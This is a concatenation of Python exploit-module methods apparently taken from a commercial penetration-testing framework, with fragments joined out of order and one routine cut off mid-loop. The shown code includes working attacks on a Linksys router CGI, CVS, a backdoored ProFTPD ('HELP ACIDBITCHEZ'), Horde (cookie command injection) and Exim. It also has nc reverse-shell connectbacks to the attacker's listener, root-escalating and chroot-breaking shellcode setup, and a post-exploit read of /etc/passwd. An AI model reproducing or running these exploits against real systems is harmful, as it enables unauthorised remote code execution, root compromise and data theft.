def dorun(self):
linksysapplycgiExploit.__init__(self, self.host, self.port)
self.sock = self.attack()
if not self.sock:
self.log("exploitation failed")
return 0
self.setInfo("%s %s:%d successfully exploited!" %
(NAME, self.host, self.port))
self.t = Telnet()
self.t.sock = self.sock
self.log("restarting httpd...")
self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n")
if self.cmdline:
self.proxy()
return
try:
shell = shelllistener(shellfromtelnet(self.t),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log(
"Could not make a shell listener - connection was closed. Exploit most likely failed."
)
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
return node
def exploitIT(self, func_pointer, shellcode_addr, offset):
self.exploiting = 1
extra = "Max-dotdot\n"
extra += "Case\n"
extra += "Set p=d\n"
extra += "UseUnchanged\n"
extra += "Global_option -n\n"
extra += "Gssapi-encrypt\n"
extra += "Update-prog x\n"
before="A" * offset + self.shellcode + \
"A" * (0x8000-offset-len(self.shellcode))+"\n"
for a in range(0, self.repeat, 4):
#if self.ISucceeded():
# return 1
if self.getState() == self.HALT:
self.raiseError("Exploit halted by user")
if not allowAddress(func_pointer + a, [0x0a, 0x0]):
continue
try:
self.debuglog(
"Trying exploit with func_pointer: 0x%08x with shellcode: 0x%08x"
% (func_pointer + a, shellcode_addr))
try:
tmp = self.Write4(func_pointer + a,
shellcode_addr,
before=before,
after=extra,
timeout=1,
debug=0)
except:
continue
try:
#if self.ISucceeded():
# self.target.add_knowledge("CVS addresses", ( func_pointer+a,shellcode_addr, offset), 100)
# return 1
## tmp is response, check last char received
check = tmp[len(tmp) - 1:]
if check.find("G") >= 0:
##print "Success ! (halted)"
##sys.stdin.read(1)
print "GOT IT! UNIX Shell Mode .."
telnetshell = Telnet()
telnetshell.sock = self.exploitsock
return telnetshell
except:
self.exploitsock.close()
pass
except timeoutsocket.Timeout:
pass
except cvserror:
pass
time.sleep(0.4)
self.raiseError("Exploit failed")
def convertToCanvas(self, sock):
self.log('Starting UnixShellNode')
tn = Telnet()
tn.sock = sock
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict['passednodes'][0]
node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1)
return node
def startup(self):
"""
Startup a /bin/sh
"""
from libs.ctelnetlib import Telnet
if self.started:
return
self.log("Startup...")
try:
#for timeoutsocket
self.connection.set_timeout(None)
except:
self.log("Not using timeoutsocket on this node")
sc = shellcodeGenerator.bsd_X86()
sc.addAttr("sendreg",{"fdreg":"ebx","regtosend":"ebx"})
sc.addAttr("read_and_exec",{"fdreg":"ebx"})
getfd = sc.get()
self.sendrequest(getfd)
#now read in our little endian word that is our fd (originally in ebx)
self.fd = self.readword()
self.log("Self.fd --> %d"%self.fd)
sc = shellcodeGenerator.bsd_X86()
if self.initstring.count("whileone"):
sc.addAttr("whileone", None)
sc.addAttr("Normalize Stack",[500])
sc.addAttr("setuid",[0])
sc.addAttr("setreuid",[0,0])
sc.addAttr("setuid",[0])
if self.initstring.count("chrootbreak"):
self.log("Doing a chrootbreak")
sc.addAttr("chrootbreak",None)
sc.addAttr("dup2",[self.fd])
sc.addAttr("setuid",None)
#myshellcode.addAttr("debugme",None)
sc.addAttr("execve",{"argv": ["/bin/sh","-i"],"envp": [],"filename": "/bin/sh"})
self.log("Sent execve...")
mainloop = sc.get()
self.sendrequest(mainloop)
telnetshell = Telnet()
telnetshell.sock=self.connection
print "Setting up shell listener."
shelllistener.__init__(self,telnetshell,logfunction=self.logfunction)
print "Set up shell listener"
#ok, now our mainloop code is running over on the other side
self.log("Set up BSD shell server")
#self.sendrequest(mainloop)
self.started = 1
return 1
def ncCallbackShell(self):
shellback = "nc -n " + self.callback.ip + " " + str(
self.data_port) + " -e /bin/sh"
payload = self.cmdExec.replace("TARGETATTRIBUTE", self.targetattribute)
payload = payload.replace("THECMD", urlencode(shellback))
lsock = self.gettcplistener(self.data_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to list on port %d" % self.data_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.data_port)
self.log("WP> Sending Exploit")
result = spkproxy.urlopen(self.url + payload,
extraheaders=self.headers,
data="",
exploit=self)
self.log("WP> Awaiting connectback")
lsock.set_timeout(30)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
def run(self):
self.getArgs()
#thread off to listen for the post
listenDaemon = threading.Thread(target=self.listen3010)
listenDaemon.setDaemon(True)
listenDaemon.start()
time.sleep(2)
#thread off to make the post
sendPost = threading.Thread(target=self.makePost)
sendPost.start()
#self.makePost()
time.sleep(3)
#wait for the request to hit the listener
self.host = self.target.interface
self.port = 1337
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
logging.info("Attacking %s:%d (in progress)" % (self.host, self.port))
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
except socket.error:
logging.info("Backdoor connection not successful")
self.setProgress(-1)
return 0
telnetshell = Telnet()
telnetshell.sock = s
self.setProgress(80)
try:
# Success, convert to unixShellNode through shellfromtelnet.
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction)
except:
logging.info(
"Could not make a shell listener - connection was closed. Exploit most likely failed"
)
import traceback
print '-' * 60
logging.traceback(file=sys.stdout)
print '-' * 60
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("%s attacking %s:%d (success!)" %
(NAME, self.host, self.port))
return node
def run(self):
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
except socket.error:
self.log("backdoor connection not successful.")
self.setProgress(-1)
return 0
telnetshell = Telnet()
telnetshell.sock = s
self.setProgress(80)
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction)
except:
self.log(
"Could not make a shell listener - connection was closed. Exploit most likely failed."
)
import traceback
print '-' * 60
traceback.print_exc(file=sys.stdout)
print '-' * 60
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
#shell=shelllistener(shellfromtelnet(tn))
node.shell = shell
self.setInfo("%s attacking %s:%d (success!)" %
(NAME, self.host, self.port))
return node
def run(self):
"""
Actually exploit the target.
"""
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port))
#first make socket connection to target
self.log("Connecting to %s:%d" % (self.host, self.port))
#self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s = self.gettcpsock()
try:
self.s.connect((self.host, int(self.port)))
except:
self.log("Could not connect!")
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return 0
self.IAC_neg()
self.do_exploit()
# need to add error checking
telnetshell = Telnet()
telnetshell.sock = self.s
try:
shell = shelllistener(shellfromtelnet(telnetshell))
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
except:
self.log("Connection closed during exploit - server is patched.")
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return None
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
#shell should always be valid here....
return node
def brute(self, desc, brute_range, brute_off):
self.log('### Computer Hacking: %s (off: %.8x)' % (desc, brute_off))
self.log('### Trying map range: %.8x-%.8x' % (brute_range[0], brute_range[1]))
system_ptr = self.find_system_ptr(brute_range[0], brute_range[1], brute_off) # base, top, off
if not system_ptr:
return None, False
fd, s = self.find_client_fd(system_ptr)
if fd == -1:
self.log('### Could not find client fd ... target /bin/sh linked to POSIX-strict shell like Dash?')
self.log('### Treating failure as false positive ... (this is probably what you want)')
return system_ptr + 0x1000 - brute_off, False
self.log('### Stage 2 success ... we can execute commands interactively :D')
self.log('### Escalating to CANVAS shell, this may take a while ...')
# there's a bit of a tradeoff by going to /bin/bash ... we lose 2 fd width chars, but fd's > 100 are
# unlikely to occur on non-busy targets ... by going through bash we ensure that our double re-direct
# works as expected ... we also have the advantage of it scrubbing our effective uid of nobody so
# our root privs work as expected ... so the width tradeoff is worth it IMO
try:
# we _SHOULD_ have a shell waiting on s for us at this point ...
tn = Telnet()
tn.sock = s
#tn.sock.send('id|sed s/i/1/g|sed s/o/0/g;HISTFILE=/dev/null bash -i\n')
#return tn,True # XXX: if you prefer a regular telnet shell on the cmdline, use this
# CANVAS specific
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict['passednodes'][0]
node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1)
return node, True
except Exception:
import traceback
traceback.print_exc(file=sys.stdout)
self.log('### Skipping false positive!')
return system_ptr + 0x1000 - brute_off, False
def run(self):
self.getArgs()
payload = self.makesploit()
if self.execCMD:
self.log('WP> Running command: %s' % (self.execCMD))
s = self.gettcpsock()
s.connect((self.host, self.port))
s.settimeout(7)
self.log("WP> Sending Exploit")
try:
s.recv(128)
s.sendall("HELP ACIDBITCHEZ\n")
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
time.sleep(1)
s.sendall(payload)
reply = s.recv(4096)
if "502 Unknown command" in reply:
self.log("WP> Exploit failed - target not vulnerable!")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Response:\n%s" % reply)
time.sleep(3)
s.close()
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
self.log("WP> Command executed successfully")
return 1
else:
lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to list on port %d" % self.rcv_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.rcv_port)
s = self.gettcpsock()
s.connect((self.host, self.port))
self.log("WP> Sending Exploit")
try:
s.recv(128)
s.sendall("HELP ACIDBITCHEZ\n")
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
time.sleep(1)
try:
s.sendall(payload)
reply = s.recv(4096)
if "502 Unknown command" in reply:
self.log("WP> Exploit failed - target not vulnerable!")
self.setInfo(
"WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
except:
print ""
self.log("WP> Awaiting connectback")
lsock.set_timeout(30)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
def handleConnection(self, connection):
try:
connection.set_timeout(None)
except:
self.log("[!] likely an ipv6 socket, set_timeout not supported !")
server = None
if self.type == self.targets.index("LINUXEXECVE_INTEL"):
self.log("Connected: Running a Linux server...")
import linuxMosdefShellServer
#time.sleep(10)
newshell = unixShellNode()
pnode = localNode()
pnode.newNode(newshell)
server = linuxMosdefShellServer.execveshellserver(
connection, newshell)
#server.addInitString(self.initstring)
#server.addInitString("chrootbreak")
server.startup()
elif self.type == self.targets.index("LINUXMOSDEF_INTEL"):
self.log("Connected, Linux MOSDEF ...")
newshell = linuxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('Linux', 'i386')(connection, newshell)
#shell=linuxMosdefShellServer.linuxshellserver(connection,newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index('OSXMOSDEF_INTEL'):
self.log('Connected, OSX MOSDEF INTEL ...')
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('OSX', 'i386')(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("OSXMOSDEF_PPC"):
self.log("Connected, OSX MOSDEF PPC ...")
import osxMosdefShellServer
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = osxMosdefShellServer.osxshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("WIN32MOSDEF_INTEL"):
self.log("Connected, running win32 MOSDEF server")
import win32MosdefShellServer
from win32Node import win32Node
newshell = win32Node()
pnode = localNode()
pnode.newNode(newshell)
shell = win32MosdefShellServer.win32shellserver(connection,
newshell,
logfunction=None)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"):
self.log("Connected, Solaris MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisshellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"):
self.log("Connected, Solaris x86 MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisx86shellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("BSDMOSDEF_INTEL"):
self.log("Connected, BSD MOSDEF")
import bsdMosdefShellserver
newshell = bsdNode()
pnode = localNode()
pnode.newNode(newshell)
shell = bsdMosdefShellserver.bsdshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_51_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.1')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_52_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.2')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("PHPMULTI"):
newsocket = connection
self.log("Starting up a %s server" % type)
import phplistener
from ScriptShellServer import phpshellserver
node = ScriptNode()
node.parentnode = self.engine.getLocalNode()
shell = phpshellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
elif self.type == self.targets.index("UNIXSHELL"):
newsocket = connection
self.log("Starting up Unix Shell")
pnode = localNode()
telnetshell = Telnet()
telnetshell.sock = newsocket
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.log)
newshell = unixShellNode()
newshell.shell = shell
shell.node = newshell
pnode.newNode(newshell)
server = shell
elif self.type == self.targets.index("JAVA"):
newsocket = connection
self.log("Starting up a %s server" % type)
from Nodes.JavaShellServer import javashellserver
from JavaNode import JavaNode
node = JavaNode()
node.parentnode = self.engine.getLocalNode()
shell = javashellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
else:
print "Don't know what type I am!"
sys.exit(1)
if self.mode == "interactive":
print "Letting user interact with server"
if server:
server.interact()
else:
print "No server...exiting this shell..."
elif self.mode == "Run one command":
print "Running a command or set of commands"
if self.uploadfiles != []:
for f in self.uploadfiles:
print "Uploading %s" % f
# Why doesn't this use exploits/upload/upload.py then?
print server.upload(f)
print server.runcommand(self.command)
###insert your post-op stuff here!!!
###you might want:
###server.doexitthread(1)
###or
server.runexitprocess()
if server:
server.disconnect()
return
def startup(self):
"""
this function is called by the engine and by self.run()
we are ready to rock!
Our stage one shellcode just reads in a word, then reads in that much data
and executes it
First we send some shellcode to get the socket registered
Then we send some shellcode to execve
"""
if self.started:
return
from libs.ctelnetlib import Telnet
self.log("Startup...")
try:
#for timeoutsocket
self.connection.set_timeout(None)
except:
self.log("Not using timeoutsocket on this node")
sc = shellcodeGenerator.linux_X86()
sc.addAttr("sendreg", {"fdreg": "ebx", "regtosend": "ebx"})
sc.addAttr("read_and_exec", {"fdreg": "ebx"})
getfd = sc.get()
self.sendrequest(getfd)
#now read in our little endian word that is our fd (originally in ebx)
self.fd = self.readword()
self.log("Self.fd=%d" % self.fd)
sc = shellcodeGenerator.linux_X86()
if self.initstring.count("whileone"):
sc.addAttr("whileone", None)
sc.addAttr("Normalize Stack", [500])
sc.addAttr("setuid", [0])
sc.addAttr("setreuid", [0, 0])
sc.addAttr("setuid", [0])
if self.initstring.count("chrootbreak"):
self.log("Doing a chrootbreak")
sc.addAttr("chrootbreak", None)
sc.addAttr("dup2", [self.fd])
sc.addAttr("setuid", None)
#myshellcode.addAttr("debugme",None)
sc.addAttr("execve", {
"argv": ["/bin/sh", "-i"],
"envp": [],
"filename": "/bin/sh"
})
self.log("Sent execve...")
mainloop = sc.get()
#print sc.getcode()
self.sendrequest(mainloop)
#now it should be running /bin/sh -i
telnetshell = Telnet()
telnetshell.sock = self.connection
print "Setting up shell listener."
shelllistener.__init__(self, telnetshell, logfunction=self.logfunction)
print "Set up shell listener"
#ok, now our mainloop code is running over on the other side
self.log("Set up Linux shell server")
#self.sendrequest(mainloop)
self.started = 1
return 1
except timeoutsocket.Timeout:
if self.debugged == True:
self.log("[!] recv timed out ..")
return 2
except Exception, msg:
# on trigger we have an exception msg == 'GO'
if msg:
self.log("== %s ==" % msg)
if 'GO' in msg:
if self.execve == True:
# telnet interact with execve shell
from libs.ctelnetlib import Telnet
telnetshell = Telnet()
telnetshell.sock = ftp.sock
telnetshell.sock.send(
'/sbin/ifconfig -a;cat /etc/passwd;uname -a\n')
return telnetshell
else:
# MOSDEF .. payload reads blindly 255 bytes and then goes into MOSDEF
# because our MOSDEF code mmaps from /dev/zero we HAVE to break chroot
from MOSDEFShellServer import MosdefShellServer
from linuxNode import linuxNode
node = linuxNode()
node.parentnode = self.argsDict["passednodes"][0]
shellServer = MosdefShellServer('Linux', 'i386')
def run(self):
self.getArgs()
useragentstring = "http://" + self.host + ":%s" % self.port + "/"
UA = spkproxy.UserAgent(useragentstring,
auth=None,
hostname=self.host,
exploit=self)
ret = 0
if self.command:
self.log("WP> Executing Command: %s" % self.command)
self.log("WP> Sending Exploit")
UA.SetCookie("href", "system:" + self.command)
data = UA.POST("%s/services/javascript.php" % self.hordepath,
"app=%s&file=open_calendar.js" % (self.hordeapp),
extraheaders=None,
noresponse=False)
lhref = 'link.href = \'#'
for i in range(len(data)):
if lhref in data[i:i + len(lhref)]:
if not '\';' in data[i + len(lhref):i + len(lhref) + 2]:
result = data[i + len(lhref):data.
find('\n\';', (i + len(lhref)))]
ret = 1
self.log("WP> Command Result:\n%s\r\n " %
prettyprint(result))
time.sleep(2)
if ret:
self.setInfo("WP> %s attacking %s:%d - completed (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return ret
else:
lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to list on port %d" % self.rcv_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.rcv_port)
self.log("WP> Sending Exploit")
# nc -n ip port -e /bin/sh \&\n
UA.SetCookie(
"href",
"system:nc -n " + self.callback.ip + " " + str(self.rcv_port) +
"%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e")
data = UA.POST("%s/services/javascript.php" % self.hordepath,
"app=%s&file=open_calendar.js" % (self.hordeapp),
extraheaders=None,
noresponse=True)
self.log("WP> Awaiting connectback")
lsock.set_timeout(30)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
def run(self):
self.getArgs()
self.host = self.target.interface
self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port))
try:
s = smtplib.SMTP(self.host, self.port, timeout=10)
except:
self.log("Could not connect to smtp")
return False
s.sock.set_timeout(20)
try:
if self.ehlo_name == "":
s.ehlo()
else:
s.ehlo(self.ehlo_name)
except:
self.log("EHLO failed")
return False
# Parse out the client hostname and ip address from the EHLO response
self.log("EHLO reply: %s" % s.ehlo_resp)
response = re.split(" |\t|\r\n|\n", s.ehlo_resp)
self.target_name = response[0]
self.client_name, self.client_ip = response[2:4]
if self.ehlo_name == "":
self.ehlo_name = s.local_hostname
# Eliminate the encapsulating [] from the target ip address
self.client_ip = self.client_ip[1:-1]
self.log("Parsing EHLO response.")
self.log("Target name = " + self.target_name)
self.log("Client name = " + self.client_name)
self.log("Client IP = " + self.client_ip)
# Send MAIL FROM using client name.
if self.mail_from == "":
self.mail_from = "canvas@%s" % self.client_name
try:
n, r = s.docmd("MAIL FROM: %s" % self.mail_from)
except:
self.log("SMTP server disconnected")
return False
if n != 250:
self.log("MAIL FROM command failed: %d %s" % (n, r))
return False
# Send RCPT TO using target name.
if self.rcpt_to == "":
self.rcpt_to = "postmaster@%s" % self.target_name
try:
n, r = s.docmd("RCPT TO: <%s>" % self.rcpt_to)
except:
self.log("SMTP server disconnected")
return False
if n != 250:
self.log("RCPT TO command failed: %d %s" % (n, r))
return False
# Send DATA command.
try:
n, r = s.docmd("DATA")
except:
self.log("SMTP server disconnected")
return False
if n != 354:
self.log("DATA command failed: %d %s" % (n, r))
return False
# Proceed to send out the headers
log_space = self.get_log_buffer_space()
self.log("Log buffer space: %u" % log_space)
# Fill the log buffer by sending headers. We reserve three bytes
# for the "%c " used for the next header, and the terminating 0
# reserved in string_format() itself.
self.log("Filling log buffer with %u bytes" % (log_space - 3))
try:
filled = self.fill_log_buffer(s.sock, log_space - 3)
except:
self.log("Filling log failed")
return False
self.log("Sent %u header bytes to accomplish this" % filled)
# Send over the attack string
self.log("Sending attack string")
try:
self.send_evil_header(s.sock)
except:
self.log("Sending evil header failed")
return False
# And finally send 50MiB of crap to go over the message size.
self.log("Sending larger message than allowed...")
try:
self.mailbomb(s.sock)
except:
self.log("Sending mailbomb failed")
return False
self.log("Done!")
# Send '.' command to terminate the mail. We expect this to
# result in a 552 error.
try:
n, r = s.docmd(".")
except:
self.log("SMTP server disconnected")
return False
if n != 552:
self.log("Sending message did not trigger 552: %d %s" % (n, r))
return False
# Trigger the ACL which string_expands() our evil header.
self.log("Trying to trigger bug")
try:
s.sock.send("MAIL FROM: <*****@*****.**>\r\n")
except:
self.log("Sending trigger failed")
return False
# See what the remote answered. This should drain either the
# SMTP return code, or the shell command line.
self.log("Verifying trigger")
try:
s.sock.recv(4096)
except:
self.log("Error reading trigger response. Daemon crashed?")
return False
# Verify if things worked. We send a string with backslashes in
# there, as the shell will eat them, while an MTA will not.
try:
s.sock.send("/bin/echo har\\har\\har\\har\r\n")
except:
self.log("Sending of verifier failed")
# See what the remote answered.
try:
response = s.sock.recv(4096)
except:
self.log("Error reading trigger response. Daemon crashed?")
return False
# harharharhar is not guaranteed to be seen in the response (for instance ubuntu 9.x with exim 4.6x)
# (maybe) better way to judge success is to try and execute a command and check reply
# if response.find("harharharhar") == -1 and response.find("access tty") == -1 and response.find("$") == -1:
# self.log("Exploit failed. Did not spawn a shell.")
# self.log("Response was: " + response)
# return False
# self.log("Success! Trigger response: " + response)
# Success, convert to unixShellNode through shellfromtelnet.
try:
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
tnshell = Telnet()
tnshell.sock = s.sock
shell = shelllistener(shellfromtelnet(tnshell))
ret = shell.runcommand('/bin/uname -a')
if not ret: raise Exception('No reason')
self.log('Runcommand output: %s' % ret)
except:
self.log('Exploit failed. Did not spawn a shell: %s' % response)
return False
self.log('Success! Trigger response: ' + response)
node.shell = shell
shell.node = node
self.setInfo("%s attacking %s:%d (succeeded!)" %
(NAME, self.host, self.port))
return node
def run(self):
self.getArgs()
payload = self.makesploit()
if self.execCMD:
self.log('WP> Running command: %s' % (self.execCMD))
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
self.log("WP> Sending Exploit")
s.recv(128)
s.sendall(payload)
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
time.sleep(5)
s.close()
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
self.log(
"WP> Command executed successfully (if reply required try TCP Connectback)"
)
return 1
else:
lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to list on port %d" % self.rcv_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.rcv_port)
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
self.log("WP> Sending Exploit")
s.recv(128)
s.sendall(payload)
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
time.sleep(3)
s.close()
self.log("WP> Awaiting connectback")
lsock.set_timeout(30)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
def run(self):
self.getArgs()
lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to listen on port %d" % self.rcv_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.rcv_port)
s = self.gettcpsock()
s.connect((self.host, self.port))
s.setblocking(0)
s.settimeout(600)
self.log("WP> Sending Exploit: Stage 1")
try:
s.recv(128)
except:
self.log("WP> Attack reported no open socket - service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
s.sendall("EHLO %s\r\n" % self.ehlo_host)
reply = s.recv(128)
if not str(self.maxMsgSz) in reply:
reply = reply.splitlines()
for i in range(len(reply)):
if '250-SIZE' in reply[i]:
reply = reply[i].split('250-SIZE ')
self.maxMsgSz = reply[1]
break
try:
s.sendall("MAIL FROM: %s\r\n" % self.from_addr)
reply = s.recv(128)
if not '250' in reply:
self.log("WP> Target denied mail from: %s - invalid address?" %
self.from_addr)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
s.sendall("RCPT TO: %s\r\n" % self.to_addr)
reply = s.recv(128)
if not '250' in reply:
self.log("WP> Target denied mail to: %s - invalid address?" %
self.to_addr)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
s.sendall("DATA\r\n")
s.recv(128)
except:
self.log("WP> Target no longer responding - Service died?")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
msgSz = (self.maxMsgSz + 262144)
log_size = 8189
log = \
"YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <%s> H=(%s) [%s]: message too big: read=%s max=%s\n" \
"Envelope-from: <%s>\nEnvelope-to: <%s>\n" \
% (self.from_addr, self.ehlo_host, self.callback.ip, str(msgSz), str(self.maxMsgSz), self.from_addr, self.to_addr)
hs = []
while len(log) < log_size:
h_name = wp_randomstring(10)
padding = wp_randomstring(128)
h = "%s: %s\n" % (h_name, padding)
m1 = (2 + len(h))
m2 = 2 * m1
remaining = log_size - len(log)
if remaining < m2 and remaining > m1:
remaining -= 4
p1 = remaining / 2
h = h[0:(p1 - 1)] + "\n"
hs += h
